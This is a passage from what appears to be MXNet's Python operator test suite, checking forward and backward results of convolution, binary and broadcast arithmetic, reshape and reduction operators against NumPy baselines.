'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv._bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv._bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol._bind(default_device(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol._bind(default_device(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
o = y.forward(is_train=True)
y.backward([mx.nd.array(out, dtype=o[0].dtype)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net._bind(default_device(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net._bind(default_device(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net._bind(default_device(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net._bind(default_device(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_device(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net._simple_bind(ctx=default_device(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_device())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_device(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b._bind(default_device(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
# check forward
assert_almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, rtol=1e-4, atol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
# check backward
assert_almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, rtol=1e-4, atol=1e-4)
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
